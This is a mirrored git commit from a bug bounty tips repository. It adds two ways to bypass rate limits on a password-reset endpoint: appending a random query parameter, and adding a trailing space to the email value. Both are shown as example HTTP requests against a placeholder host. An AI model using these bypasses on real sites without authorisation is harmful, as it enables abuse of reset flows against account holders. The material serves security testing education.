mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2025-02-22 22:53:47 +00:00
Bypass Rate Limit [2]
Add 2 tips
This commit is contained in:
parent
753e0e5031
commit
da84a9479b
@ -45,3 +45,37 @@ Cookie: aaaaaaaaaaaaa
|
||||
|
||||
email=victim@gmail.com
|
||||
```
|
||||
|
||||
4. Add a random parameter on the last endpoint
|
||||
```
|
||||
POST /ForgotPass.php HTTP/1.1
|
||||
Host: target.com
|
||||
[...]
|
||||
|
||||
email=victim@gmail.com
|
||||
```
|
||||
Try this to bypass
|
||||
```
|
||||
POST /ForgotPass.php?random HTTP/1.1
|
||||
Host: target.com
|
||||
[...]
|
||||
|
||||
email=victim@gmail.com
|
||||
```
|
||||
|
||||
5. Add space after the parameter value
|
||||
```
|
||||
POST /api/forgotpass HTTP/1.1
|
||||
Host: target.com
|
||||
[...]
|
||||
|
||||
{"email":"victim@gmail.com"}
|
||||
```
|
||||
Try this to bypass
|
||||
```
|
||||
POST /api/forgotpass HTTP/1.1
|
||||
Host: target.com
|
||||
[...]
|
||||
|
||||
{"email":"victim@gmail.com "}
|
||||
```
|
||||
|
Loading…
Reference in New Issue
Block a user